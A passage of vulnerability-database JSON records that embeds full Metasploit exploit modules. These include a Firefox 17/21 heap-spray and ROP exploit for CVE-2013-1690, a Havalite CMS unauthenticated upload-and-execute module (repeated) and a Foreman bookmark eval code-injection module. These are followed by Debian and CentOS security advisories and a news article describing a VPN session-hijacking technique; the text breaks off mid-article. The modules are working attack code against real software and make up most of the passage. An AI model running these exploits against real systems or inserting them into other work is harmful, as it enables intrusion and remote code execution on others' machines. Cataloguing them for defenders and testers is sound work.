'Author' =>\n [\n 'Nils', # vulnerability discovery\n 'Unknown', # 1day exploit, prolly the FBI\n 'w3bd3vil', # 1day analysis\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1690' ],\n [ 'OSVDB', '94584'],\n [ 'BID', '60778'],\n [ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ],\n [ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ],\n [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ],\n [ 'URL', 'http://krash.in/ffn0day.txt' ],\n [ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Firefox 17 & Firefox 21 / Windows XP SP3',\n {\n 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory\n 'RetGadget' => 0x77c3ee16, # ret from msvcrt\n 'StackPivot' => 0x76C9B4C2, # xcht ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP\n 'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory\n }\n ]\n ],\n 'DisclosureDate' => 'Jun 25 2013',\n 'DefaultTarget' => 0))\n\n end\n\n def stack_pivot\n pivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n pivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n pivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n return pivot\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\").first\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n vprint_status(\"Agent: #{agent}\")\n\n if agent !~ /Windows NT 5\\.1/\n print_error(\"Windows XP not found, sending 404: #{agent}\")\n send_not_found(cli)\n return\n 
end\n\n unless agent =~ /Firefox\\/(17|21)/\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n my_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource\n\n # build html\n code = [\n target['VFuncPtr'],\n target['RetGadget'],\n target['StackPivot'],\n junk\n ].pack(\"V*\")\n code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})\n js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))\n js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))\n\n content = <<-HTML\n<html>\n<body>\n<iframe src=\"#{my_uri}/iframe.html\"></iframe>\n</body></html>\n HTML\n\n # build iframe\n iframe = <<-IFRAME\n<script>\nvar z=\"<body><img src='nonexistant.html' onerror=\\\\\"\\\\\" ></body>\";\nvar test = new Array();\nvar heap_chunks;\nfunction heapSpray(shellcode, fillsled) {\n var chunk_size, headersize, fillsled_len, code;\n var i, codewithnum;\n chunk_size = 0x40000;\n headersize = 0x10;\n fillsled_len = chunk_size - (headersize + shellcode.length);\n while (fillsled.length <fillsled_len)\n fillsled += fillsled;\n fillsled = fillsled.substring(0, fillsled_len);\n code = shellcode + fillsled;\n heap_chunks = new Array();\n for (i = 0; i<1000; i++)\n {\n codewithnum = \"HERE\" + code;\n heap_chunks[i] = codewithnum.substring(0, codewithnum.length);\n }\n}\n\n\nfunction b() {\n for(var c=0;1024>c;c++) {\n test[c]=new ArrayBuffer(180);\n bufView = new Uint32Array(test[c]);\n for (var i=0; i < 45; i++) {\n bufView[i] = #{target['FakeObject']};\n }\n }\n}\n\nfunction a() {\n window.stop();\n var myshellcode = unescape(\"#{js_code}\");\n var myfillsled = unescape(\"#{js_random}\");\n heapSpray(myshellcode,myfillsled);\n b();\n window.parent.frames[0].frameElement.ownerDocument.write(z);\n}\n\ndocument.addEventListener(\"readystatechange\",a,null);\n</script>\n IFRAME\n\n print_status(\"URI #{request.uri} requested...\")\n\n 
if request.uri =~ /iframe\\.html/\n print_status(\"Sending iframe HTML\")\n send_response(cli, iframe, {'Content-Type'=>'text/html'})\n return\n end\n\n print_status(\"Sending HTML\")\n send_response(cli, content, {'Content-Type'=>'text/html'})\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T13:41:47", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 108}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-08T19:08:35", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 1.9, "vector": "NONE", "modified": "2019-10-08T19:08:35"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2294-1", "OPENSUSE-SU-2019:2292-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2019:2288-1", "OPENSUSE-SU-2019:2280-1", "OPENSUSE-SU-2019:2281-1", "OPENSUSE-SU-2019:2279-1", "OPENSUSE-SU-2019:2278-1"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1950-1:F990F", "DEBIAN:DLA-1949-1:95A46"]}, {"type": "redhat", "idList": ["RHSA-2019:2980", "RHSA-2019:2979", "RHSA-2019:2978", "RHSA-2019:2977", "RHSA-2019:2975", "RHSA-2019:2974", "RHSA-2019:2973"]}, {"type": "symantec", "idList": ["SMNTC-110339"]}, {"type": 
"ubuntu", "idList": ["USN-4149-1"]}], "modified": "2019-10-08T19:08:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script 
type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T19:08:35", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 109}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": 
"7b61e8490a14c0adedc25cc6604032a9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection", "description": "This module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier).\n", "published": "2013-07-16T15:07:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2121", "https://bugzilla.redhat.com/show_bug.cgi?id=968166", "http://projects.theforeman.org/issues/2631"], "cvelist": ["CVE-2013-2121"], "lastseen": "2019-11-10T21:18:10", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2019-11-10T21:18:10"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2121"]}, {"type": "zdt", "idList": ["1337DAY-ID-21021"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122510"]}, {"type": "exploitdb", "idList": ["EDB-ID:27045"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/FOREMAN_OPENSTACK_SATELLITE_CODE_EXEC"]}, {"type": "redhat", "idList": ["RHSA-2013:0995"]}], "modified": "2019-11-10T21:18:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize\n super(\n 'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',\n 'Description' => %q{\n This module exploits a code injection vulnerability in the 'create'\n action of 
'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier).\n },\n 'Author' => 'Ramon de C Valle',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2013-2121'],\n ['CWE', '95'],\n ['OSVDB', '94671'],\n ['BID', '60833'],\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],\n ['URL', 'http://projects.theforeman.org/issues/2631']\n ],\n 'Platform' => 'ruby',\n 'Arch' => ARCH_RUBY,\n 'Privileged' => false,\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'DisclosureDate' => 'Jun 6 2013',\n 'DefaultOptions' => { 'PrependFork' => true },\n 'DefaultTarget' => 0\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('USERNAME', [true, 'Your username', 'admin']),\n OptString.new('PASSWORD', [true, 'Your password', 'changeme']),\n OptString.new('TARGETURI', [ true, 'The path to the application', '/']),\n ], self.class\n )\n end\n\n def exploit\n print_status(\"Logging into #{target_url}...\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'users', 'login'),\n 'vars_post' => {\n 'login[login]' => datastore['USERNAME'],\n 'login[password]' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::Unknown, 'No response from remote host') if res.nil?\n\n if res.headers['Location'] =~ /users\\/login$/\n fail_with(Failure::NoAccess, 'Authentication failed')\n else\n session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?\n end\n\n print_status('Retrieving the CSRF token for this session...')\n res = send_request_cgi(\n 'cookie' => \"_session_id=#{session}\",\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri)\n )\n\n fail_with(Failure::Unknown, 'No response from remote host') if res.nil?\n\n if res.headers['Location'] =~ /users\\/login$/\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')\n 
else\n csrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i\n csrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i\n\n if csrf_param.nil? || csrf_token.nil?\n csrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\n csrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\n end\n\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?\n end\n\n payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)\n\n print_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\")\n res = send_request_cgi(\n 'cookie' => \"_session_id=#{session}\",\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'bookmarks'),\n 'vars_post' => {\n csrf_param => csrf_token,\n payload_param => payload.encoded,\n 'bookmark[controller]' => \"eval(params[:#{payload_param}])#\",\n 'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),\n 'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)\n }\n )\n end\n\n def target_url(*args)\n (ssl ? 
'https' : 'http') +\n if rport.to_i == 80 || rport.to_i == 443\n \"://#{vhost}\"\n else\n \"://#{vhost}:#{rport}\"\n end + normalize_uri(target_uri.path, *args)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-10T21:18:10", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 110}], "viewCount": 11, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-11-10T23:28:06"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1986-1:E0EB6", "DEBIAN:DLA-1987-1:E3D38", "DEBIAN:DLA-1984-1:5FA59", "DEBIAN:DLA-1985-1:4C9DB", "DEBIAN:DSA-4561-1:56D39"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2477-1", "OPENSUSE-SU-2019:2472-1", "OPENSUSE-SU-2019:2474-1", "OPENSUSE-SU-2019:2466-1", "OPENSUSE-SU-2019:2453-1", "OPENSUSE-SU-2019:2454-1", "OPENSUSE-SU-2019:2464-1", "OPENSUSE-SU-2019:2452-1", "OPENSUSE-SU-2019:2459-1", "OPENSUSE-SU-2019:2451-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:97F975C073505AE88655FF1C539740A6"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-2216.NASL", "GENTOO_GLSA-201911-02.NASL"]}], "modified": "2019-11-10T23:28:06"}, "vulnersScore": 1.1}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}
{"centos": [{"lastseen": "2019-12-07T03:31:19", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2019:4024\n\n\nSimple DirectMedia Layer (SDL) is a cross-platform multimedia library designed to provide fast access to the graphics frame buffer and audio device.\n\nSecurity Fix(es):\n\n* SDL: CVE-2019-13616 not fixed in Red Hat Enterprise Linux 7 erratum RHSA-2019:3950 (CVE-2019-14906)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-December/023538.html\n\n**Affected packages:**\nSDL\nSDL-devel\nSDL-static\n\n**Upstream details at:**\n", "modified": "2019-12-06T23:34:45", "published": "2019-12-06T23:34:45", "id": "CESA-2019:4024", "href": "http://lists.centos.org/pipermail/centos-announce/2019-December/023538.html", "title": "SDL security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-12-07T10:16:37", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4579-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nDecember 06, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : nss\nCVE ID : CVE-2019-11745 CVE-2019-17007\n\nTwo vulnerabilities were discovered in NSS, a set of cryptographic\nlibraries, which may result in denial of service and potentially the\nexecution of arbitrary code.\n \nFor the stable distribution (buster), these problems have been fixed in\nversion 2:3.42.1-1+deb10u2.\n\nWe recommend that you upgrade your nss packages.\n\nFor the detailed security status of nss please refer to\nits security tracker 
page at:\nhttps://security-tracker.debian.org/tracker/nss\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2019-12-06T21:54:40", "published": "2019-12-06T21:54:40", "id": "DEBIAN:DSA-4579-1:BA112", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00232.html", "title": "[SECURITY] [DSA 4579-1] nss security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-06T22:18:25", "bulletinFamily": "unix", "description": "Package : librabbitmq\nVersion : 0.5.2-2+deb8u1\nCVE ID : CVE-2019-18609\nDebian Bug : #946005\n\nIt was discovered that there was an integer overflow vulnerability in\nlibrabbitmq, a library for robust messaging between applications and\nservers.\n\nFor Debian 8 "Jessie", this issue has been fixed in librabbitmq version\n0.5.2-2+deb8u1.\n\nWe recommend that you upgrade your librabbitmq packages.\n\n\nRegards,\n\n- -- \n ,''`.\n : :' : Chris Lamb\n `. 
`'` lamby@debian.org / chris-lamb.co.uk\n `-\n\n", "modified": "2019-12-06T15:05:37", "published": "2019-12-06T15:05:37", "id": "DEBIAN:DLA-2022-1:9334B", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201912/msg00004.html", "title": "[SECURITY] [DLA 2022-1] librabbitmq security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T22:18:27", "bulletinFamily": "unix", "description": "Package : libav\nVersion : 6:11.12-1~deb8u9\nCVE ID : CVE-2017-17127 CVE-2017-18245 CVE-2018-19128 CVE-2018-19130 \n CVE-2019-14443 CVE-2019-17542\n\n\nSeveral security issues were fixed in libav, a multimedia library for\nprocessing audio and video files.\n\nCVE-2017-17127\n\n The vc1_decode_frame function in libavcodec/vc1dec.c allows remote\n attackers to cause a denial of service (NULL pointer dereference\n and application crash) via a crafted file.\n CVE-2018-19130 is a duplicate of this vulnerability.\n\nCVE-2017-18245\n\n The mpc8_probe function in libavformat/mpc8.c allows remote\n attackers to cause a denial of service (heap-based buffer\n over-read) via a crafted audio file on 32-bit systems.\n\nCVE-2018-19128\n\n Heap-based buffer over-read in decode_frame in libavcodec/lcldec.c\n allows an attacker to cause denial-of-service via a crafted avi\n file.\n\nCVE-2019-14443\n\n Division by zero in range_decode_culshift in libavcodec/apedec.c\n allows remote attackers to cause a denial of service (application\n crash), as demonstrated by avconv.\n\nCVE-2019-17542\n\n Heap-based buffer overflow in vqa_decode_chunk because of an\n out-of-array access in vqa_decode_init in libavcodec/vqavideo.c.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n6:11.12-1~deb8u9.\n\nWe recommend that you upgrade your libav packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: 
https://wiki.debian.org/LTS\n", "modified": "2019-12-05T18:49:12", "published": "2019-12-05T18:49:12", "id": "DEBIAN:DLA-2021-1:97C0E", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201912/msg00003.html", "title": "[SECURITY] [DLA 2021-1] libav security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-12-06T17:02:13", "bulletinFamily": "info", "description": "A vulnerability in most Linux distros has been uncovered that allows a network-adjacent attacker to hijack VPN connections and inject rogue data into the secure tunnels that victims are using to communicate with remote servers.\n\nAccording to researchers at University of New Mexico and Breakpointing Bad, the bug (CVE-2019-14899), \u201callows\u2026an attacker to determine if\u2026a user is connected to a VPN, the virtual IP address they have been assigned by the VPN server, and whether or not there is an active connection to a given website.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn [an advisory](<https://seclists.org/oss-sec/2019/q4/122>) released this week, they noted that once a proof-of-concept exploit allowed them to determine a VPN client\u2019s virtual IP address and make inferences about active connections, they were then able to use encrypted replies to unsolicited packets to determine the sequence and acknowledgment numbers of connections. These allowed them to hijack TCP sessions and inject data into the TCP stream.\n\n## Anatomy of an Attack\n\nAn attack would require convincing a user to connect to a rogue wireless access point (or other internet connection) under the adversary\u2019s control (imagine a coffee shop scenario, for instance). The attacker can then start scanning devices connected to the access point for active VPN sessions.\n\nTo do this, the access point can send SYN-ACK packets to any connected devices, canvassing across the entire virtual IP space. 
When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker. An automated script would presumably make this process painless for the adversary.\n\nOnce the attacker determines that the user has an active TCP connection to an external server, the next step is to sniff out the next sequence number and in-window acknowledgment number needed to inject forged packets into the connection.\n\nTo find the appropriate sequence and ACK numbers, the attacker can continually spoof reset packets into the active connection until it sniffs challenge ACKs.\n\n\u201cThe victim\u2019s device will trigger a TCP challenge ACK on each reset it receives that has an in-window sequence number for an existing connection,\u201d according to the advisory. \u201cFor example, if the client is using OpenVPN to exchange encrypted packets with the VPN server, then the client will always respond with an SSL packet of length 79 when a challenge ACK is triggered.\u201d\n\nContinuing with packet-spoofing and challenge ACK analysis (detailed in the advisory), an attacker can infer the rest of the information needed to inject arbitrary payloads into the victim\u2019s active VPN session.\n\n## Affected OS and VPNs\n\nThe bug affects macOS, iOS and Android, most Linux distributions including Ubuntu, Fedora and Debian, as well as Unix-like OS such as FreeBSD and OpenBSD. At particular risk are those Linux distros that use a version of systemd pulled after November 28 of last year, which turned reverse path filtering off, researchers warned. 
The IPv4 version of CentOS has been confirmed as unaffected.\n\nAs for VPN technology, researchers found that a proof-of-concept exploit works against OpenVPN, WireGuard and IKEv2/IPSec, and they\u2019re in the process of testing Tor.\n\n\u201cThe VPN technology used does not seem to matter and we are able to make all of our inferences even though the responses from the victim are encrypted, using the size of the packets and number of packets sent (in the case of challenge ACKs, for example) to determine what kind of packets are being sent through the encrypted VPN tunnel,\u201d according to the advisory.\n\nThe bug has been reported to distros and the Linux kernel security team, as well as to others impacted such as Systemd, Google, Apple, OpenVPN, and WireGuard.\n\n\u201cAdding a prerouting rule to drop packets destined for the client\u2019s virtual IP address is an effective [mitigation] on some systems,\u201d according to the advisory. \u201cThere are other potential solutions being considered by the kernel maintainers, but I can\u2019t speak to their current status.\u201d\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. 
